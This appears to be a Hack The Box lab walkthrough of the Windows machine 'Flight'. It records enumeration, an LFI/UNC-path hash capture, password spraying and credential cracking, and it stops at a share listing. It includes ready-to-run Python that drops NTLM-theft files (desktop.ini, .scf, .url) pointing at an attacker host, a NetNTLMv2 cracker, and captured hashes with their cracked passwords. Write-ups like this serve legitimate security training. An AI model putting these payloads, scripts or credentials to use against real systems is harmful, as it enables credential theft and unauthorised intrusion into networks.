
HTB - Flight


Last updated 10 months ago

Machine Info

Flight is a hard Windows machine that starts with a website serving two different virtual hosts. One of them is vulnerable to LFI, and because the include accepts a UNC path it lets an attacker capture a NetNTLMv2 hash. Once cracked, the obtained clear-text password is sprayed across a list of valid usernames to discover a password re-use scenario. With SMB access as the user s.moon, the attacker is able to write to a share that gets accessed by other users. Certain files dropped there can be used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked, the attacker is able to write a reverse shell to the share that hosts the web files and gain a shell on the box as a low-privileged user. Having credentials for the user c.bum, it is possible to gain a shell as this user, which allows the attacker to write an ASPX web shell to a web site configured to listen only on localhost. Once the attacker has command execution as the Microsoft Virtual Account, he is able to run Rubeus to get a ticket for the machine account that can be used to perform a DCSync attack, ultimately obtaining the hashes for the Administrator user, or to abuse SeImpersonatePrivilege to gain a SYSTEM shell.

Enumeration


Scope

IP Address: 10.10.11.187

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
636/tcp  open  ldapssl          syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack
9389/tcp open  adws             syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap  -sU -p1-10000 --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE
53/udp  open  domain
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-20 10:26:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-20T10:28:25
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m03s
* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - LDAP - LDAPS - WinRM
* Versions: Apache httpd 2.4.52 - PHP/8.1.1
* Important notes: Domain: flight.htb, host G0. The combination of 53/88/389/636/3268/3269/9389 means this host is the domain controller. SMB signing is enabled and required, so any NetNTLM hash captured later has to be cracked rather than relayed to this host. The clock skew is about 7 hours; Kerberos rejects requests outside a 5-minute window by default, so sync the clock (ntpdate, or wrap Kerberos tooling in faketime) before requesting tickets.

Since a web server is listening on port 80, I started by fuzzing for virtual hosts (subdomains) through the Host header, filtering out the 7069-byte response the default vhost returns for unknown names.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.flight.htb" -fs 7069

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev

school     [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 113ms] 

Update /etc/hosts file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo sh -c "echo  '$ip flight.htb school.flight.htb' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.11.187 flight.htb school.flight.htb

DNS Enumeration

I tried a DNS zone transfer for both names, but the server refused it.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ dig axfr flight.htb @$ip                                 

; <<>> DiG 9.19.19-1-Debian <<>> axfr flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ dig axfr school.flight.htb @$ip

; <<>> DiG 9.19.19-1-Debian <<>> axfr school.flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.

RPC Enumeration

Null-session RPC access is denied:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ rpcclient -U '%' $ip

rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

SMB Enumeration

Nothing from SMB either: an anonymous session lists no shares, the null session is not allowed to enumerate them, and the guest account is disabled.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ smbclient -N -L //$ip                                                    

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.187 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ crackmapexec smb $ip -u '' -p '' --shares                               

SMB   10.10.11.187    445    G0    [+] flight.htb\: 
SMB   10.10.11.187    445    G0    [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares

SMB    10.10.11.187    445    G0    [-] flight.htb\guest: STATUS_ACCOUNT_DISABLED 

KERBEROS Enumeration

I ran kerbrute to find at least some valid usernames, but with no luck (as the user list obtained later shows, accounts follow an F.Lastname pattern with a dot, which jsmith.txt does not contain).

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/MultiMasters]
└─$ kerbrute userenum --dc $ip -d flight.htb -t 100 /usr/share/wordlists/seclists/Usernames/jsmith.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/19 23:40:57 >  Done! Tested 48705 usernames (0 valid) in 51.969 seconds

LDAP Enumeration

No info from LDAP: anonymous bind is not allowed, so an unauthenticated search only returns an operations error.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ldapsearch -H ldap://$ip -x -b "DC=FLIGHT,DC=HTB" -s sub '*'

search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

HTTP Enumeration

http://10.10.11.187/

The main site is static and directory fuzzing turned up nothing, so I moved on to the school.flight.htb vhost found earlier.

http://school.flight.htb/

Shell as svc_apache

The school vhost includes files through the view parameter: http://school.flight.htb/index.php?view=about.html

I tried to include a local file with these traversal payloads, but without luck:

C:\Windows\System32\drivers\etc\hosts
..\..\..\Windows\System32\drivers\etc\hosts
./../../../Windows/System32/drivers/etc/hosts

However, C:/windows/system32/drivers/etc/hosts worked, so the include appears to reject backslashes and ../ sequences but accepts an absolute path written with forward slashes.

Since the parameter reaches a file include on a Windows host, it was worth testing for RFI with a UNC path as well: I started a local SMB server and visited /index.php?view=///10.10.16.7/share. PHP tried to open the share, and the Apache service account authenticated to my server with NTLM, handing over its NetNTLMv2 response:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-smbserver -smb2support share .                                                              
[*] Incoming connection (10.10.11.187,49850)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000

The hash was cracked successfully

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt 

SVC_APACHE::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:S@Ss!K@*t13

Session..........: hashcat
Status...........: Cracked
  • After getting valid credentials, I will do the following:

    • Explore the shares for interesting files with spider_plus module with CME

    • Enumerate the domain with rpcclient & bloodhound.py

bloodhound.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ bloodhound-python -u 'svc_apache' -p 'S@Ss!K@*t13' -ns $ip -d flight.htb -c all --zip

<snip>
INFO: Done in 00M 14S
INFO: Compressing output into 20240720003141_bloodhound.zip

rpcclient to get domain users

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rpcclient -U 'svc_apache%S@Ss!K@*t13' $ip -c enumdomusers | tee -a users.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[S.Moon] rid:[0x642]
user:[R.Cold] rid:[0x643]
user:[G.Lors] rid:[0x644]
user:[L.Kein] rid:[0x645]
user:[M.Gold] rid:[0x646]
user:[C.Bum] rid:[0x647]
user:[W.Walker] rid:[0x648]
user:[I.Francis] rid:[0x649]
user:[D.Truff] rid:[0x64a]
user:[V.Stevens] rid:[0x64b]
user:[svc_apache] rid:[0x64c]
user:[O.Possum] rid:[0x64d]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ cat users.txt | cut -d\[ -f2 | cut -d\] -f1  | tee -a users.lst
Administrator
Guest
krbtgt
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.Possum

I then tried AS-REP roasting against these users, but none of them has Kerberos pre-authentication disabled :(

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-GetNPUsers FLIGHT.HTB/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst

<snip>
[-] User C.Bum doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User W.Walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User I.Francis doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>

I then sprayed the svc_apache password against the whole user list to see whether it is reused (a single password per user, which stays well below any sensible lockout threshold):

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u users.lst  -p 'S@Ss!K@*t13' --continue-on-success
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE 

Enumerating the shares as svc_apache turned up nothing interesting (read access only, as the listing below shows), so I repeated the check as S.Moon.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u 'svc_apache' -p 'S@Ss!K@*t13' --shares

SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB         10.10.11.187    445    G0               [+] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share
SMB         10.10.11.187    445    G0               Shared          READ
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share
SMB         10.10.11.187    445    G0               Users           READ
SMB         10.10.11.187    445    G0               Web             READ  

S.Moon, unlike svc_apache, has write access to the Shared folder, so I can drop a malicious .scf or .lnk file there to capture the NTLMv2 response of any user that browses the share:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u S.Moon -p 'S@Ss!K@*t13' --shares

SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [+] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ
SMB         10.10.11.187    445    G0               Web             READ   

I mounted the Shared folder to my kali machine for easy exploring

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo mount -t cifs "\\\\$ip\\Shared" ./shared -o "username=S.Moon,password=S@Ss\!K@*t13" 

I tried to drop several file types, but writes are rejected by extension. Since the same account can create other names in the same folder, this is not an NTFS permission problem but looks like a server-side file screen (FSRM) or similar policy that blocks specific extensions:

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.scf
touch: cannot touch 'file.scf': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.lnk
touch: cannot touch 'file.lnk': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.ico

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.exe
touch: cannot touch 'file.exe': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.bat
touch: cannot touch 'file.bat': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.dll
touch: cannot touch 'file.dll': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.txt
touch: cannot touch 'file.txt': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.ini

Shell as c.bum

.ico and .ini were accepted, so I followed the post linked at the end of this page (Places of Interest in Stealing NetNTLM Hashes) to build a desktop.ini whose IconResource points at my SMB server, since I did not know the structure the file needs. The file has to be named exactly desktop.ini for Windows to parse it.

There is also a tool that can create multiple files that can be dropped:

https://github.com/Greenwolf/ntlm_theft
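Before dropping payloads it helps to know which extensions the screen accepts, and the touch-by-touch test above is easy to script. The following is an added example (my code, not from the original post and not ntlm_theft's code) that probes a mounted share the same way and then writes only the capture files whose extension gets through: the desktop.ini that worked here, plus the .scf and .url variants for shares that allow them, so it goes a little beyond what this box needed. The attacker IP 10.10.16.7 and the share name come from the impacket-smbserver listener used in this writeup; icon.ico is a placeholder name, as is the temporary directory the demo falls back to when no share path is given. One caveat: Explorer honours desktop.ini only in a folder that carries the read-only or system attribute, so on a real engagement check the target folder's attributes before relying on it.

```python
"""Probe a writable share for extensions a file screen lets through, then
drop NTLM-capture payloads only where the extension is allowed.

Added example (not from the original post, nor ntlm_theft's code). It assumes
the share is mounted locally, as with `mount -t cifs` above, and that
ATTACKER_IP/SHARE name the impacket-smbserver listener. Every payload carries
a UNC path; when Windows renders the icon it authenticates to that host with
NTLM, which is what leaks the NetNTLMv2 response.
"""
import os
import tempfile

ATTACKER_IP = "10.10.16.7"      # Kali listener used throughout this writeup
SHARE = "share"


def build_payloads(attacker_ip: str, share: str) -> dict:
    """filename -> content. desktop.ini must keep that exact name; the .scf and
    .url variants are the classic alternatives for shares that allow them."""
    unc = f"\\\\{attacker_ip}\\{share}\\icon.ico"          # icon.ico is a placeholder
    return {
        "desktop.ini": f"[.ShellClassInfo]\r\nIconResource={unc}\r\n",
        "readme.scf": (f"[Shell]\r\nCommand=2\r\nIconFile={unc}\r\n"
                       "[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
        "readme.url": (f"[InternetShortcut]\r\nURL=https://flight.htb/\r\n"
                       f"IconIndex=0\r\nIconFile={unc}\r\n"),
    }


def probe_extensions(share_dir: str, extensions) -> dict:
    """Create and remove an empty file per extension. A server-side file screen
    (FSRM) rejects blocked names with ACCESS_DENIED, which a CIFS mount surfaces
    as PermissionError. Returns {ext: allowed}."""
    allowed = {}
    for ext in extensions:
        path = os.path.join(share_dir, "probe" + ext)
        try:
            open(path, "x").close()
        except PermissionError:
            allowed[ext] = False
        else:
            allowed[ext] = True
            os.remove(path)                 # leave only what we drop deliberately
    return allowed


def drop_allowed_payloads(share_dir: str, attacker_ip: str, share: str) -> list:
    """Probe first, then write only the payloads whose extension passed."""
    payloads = build_payloads(attacker_ip, share)
    exts = sorted({os.path.splitext(name)[1] for name in payloads})
    allowed = probe_extensions(share_dir, exts)
    dropped = []
    for name, body in payloads.items():
        if allowed[os.path.splitext(name)[1]]:
            with open(os.path.join(share_dir, name), "w", newline="") as fh:
                fh.write(body)              # newline="" keeps the CRLF line endings
            dropped.append(name)
    return dropped


def demo(share_dir: str = None) -> dict:
    """Run against a directory; defaults to a fresh temp dir (an assumption for
    the stand-alone run), which has no file screen, so everything is allowed."""
    share_dir = share_dir or tempfile.mkdtemp(prefix="shared-")
    probed = probe_extensions(share_dir, [".scf", ".lnk", ".url", ".exe", ".txt", ".ini", ".ico"])
    dropped = drop_allowed_payloads(share_dir, ATTACKER_IP, SHARE)
    ini_path = os.path.join(share_dir, "desktop.ini")
    ini = open(ini_path, newline="").read() if os.path.exists(ini_path) else None
    return {"dir": share_dir, "probed": probed, "dropped": dropped, "desktop_ini": ini}


if __name__ == "__main__":
    import sys
    result = demo(sys.argv[1] if len(sys.argv) > 1 else None)   # e.g. ./shared from the mount above
    for ext, ok in result["probed"].items():
        print(f"{ext:5} {'allowed' if ok else 'blocked'}")
    print("dropped:", ", ".join(result["dropped"]))
```

Run it with the mount point as the argument (`python3 drop.py ./shared`) while impacket-smbserver is listening; against the Flight share only desktop.ini would be written, since .scf and .url are screened.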

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-smbserver -smb2support share . 

c.bum::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt 

C.BUM::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:Tikkycoll_431012284

Session..........: hashcat
Status...........: Cracked
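Both captured responses were cracked with hashcat mode 5600. To make explicit what hashcat recomputes for every rockyou candidate, here is an added example (my code, not part of the original post, of hashcat or of impacket) that re-implements the NetNTLMv2 check in Python and verifies the two hash lines captured above against the cracked passwords. The only data not taken from this page is the constructed hash line and three-word wordlist used by forge_5600 and crack in the self-test. Note the domain field: the Apache service account sent "flight" while C.Bum's session sent "flight.htb"; the client derives its NTLMv2 key from that exact string (and from the upper-cased user name), so it must be kept as captured, which is why the hash format carries it. And because SMB signing is required on this host (nmap host script output above), cracking rather than relaying is the only way to use these responses.

```python
"""NetNTLMv2 check, as hashcat -m 5600 performs it (added example).

Line format:  USER::DOMAIN:server_challenge:NTProofStr:blob[:password]
  NT hash     = MD4(UTF-16LE(password))
  NTLMv2 key  = HMAC-MD5(NT hash, UTF-16LE(upper(USER) + DOMAIN))
  NTProofStr  = HMAC-MD5(NTLMv2 key, server_challenge || blob)
DOMAIN is used exactly as the client sent it, so "flight" and "flight.htb"
give different keys; the user name is upper-cased before hashing.
"""
import hashlib
import hmac
import struct

# The two responses captured with impacket-smbserver earlier in this writeup.
SVC_APACHE_HASH = "svc_apache::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000"
C_BUM_HASH = "c.bum::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000"


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib.new('md4') is unavailable on many
    OpenSSL 3 systems because MD4 lives in the legacy provider."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)               # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rot = lambda v, n: ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(48):
            if i < 16:                                    # round 1: F, words in order
                f, k, s, t = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:                                  # round 2: G, column order
                f = (b & c) | (b & d) | (c & d)
                k, s, t = (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:                                         # round 3: H, bit-reversed order
                f = b ^ c ^ d
                k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i - 32]
                s, t = (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rot((a + f + x[k] + t) & 0xFFFFFFFF, s), b, c
        state = [(v + w) & 0xFFFFFFFF for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: user upper-cased, domain as captured (case-sensitive)."""
    identity = (user.upper() + domain).encode("utf-16le")
    return hmac.new(nt_hash(password), identity, hashlib.md5).digest()


def parse_5600(line: str) -> dict:
    user, _, domain, challenge, proof, rest = line.strip().split(":", 5)
    blob = rest.split(":", 1)[0]                           # drop ':password' if present
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def check_password(line: str, candidate: str) -> bool:
    """True if candidate reproduces the NTProofStr in the captured line."""
    h = parse_5600(line)
    key = ntlmv2_key(candidate, h["user"], h["domain"])
    proof = hmac.new(key, h["challenge"] + h["blob"], hashlib.md5).digest()
    return hmac.compare_digest(proof, h["proof"])


def crack(line: str, candidates):
    """What hashcat does per wordlist entry; returns the first match or None."""
    for pw in candidates:
        if check_password(line, pw):
            return pw
    return None


def forge_5600(password, user, domain, challenge: bytes, blob: bytes) -> str:
    """Build a hash line the way a client would; used for self-tests with
    constructed data, not for the captured responses above."""
    proof = hmac.new(ntlmv2_key(password, user, domain), challenge + blob, hashlib.md5)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hexdigest()}:{blob.hex()}"


if __name__ == "__main__":
    for line, pw in ((SVC_APACHE_HASH, "S@Ss!K@*t13"), (C_BUM_HASH, "Tikkycoll_431012284")):
        h = parse_5600(line)
        print(f"{h['user']}@{h['domain']}: {pw!r} -> {check_password(line, pw)}")
    # a three-entry "wordlist" standing in for rockyou.txt
    print("crack:", crack(C_BUM_HASH, ["password", "S@Ss!K@*t13", "Tikkycoll_431012284"]))
```

The MD4 is implemented by hand because OpenSSL 3 moved it into the legacy provider and hashlib.new('md4') raises on most current distributions; everything else is plain HMAC-MD5 from the standard library. Try check_password with the domain changed to "FLIGHT" and it fails, which is the practical reason never to normalise that field before cracking.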

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nxc smb $ip -u 'C.BUM' -p 'Tikkycoll_431012284'

SMB         10.10.11.187    445    G0               [+] flight.htb\C.BUM:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               Node C.BUM@FLIGHT.HTB successfully set as owned in BloodHound

From the BloodHound data, C.Bum is a member of the web development group, so I expected write permission on the Web share we saw earlier. As I guessed:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nxc smb $ip -u 'C.BUM' -p 'Tikkycoll_431012284' --shares

SMB         10.10.11.187    445    G0               [+] flight.htb\C.BUM:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
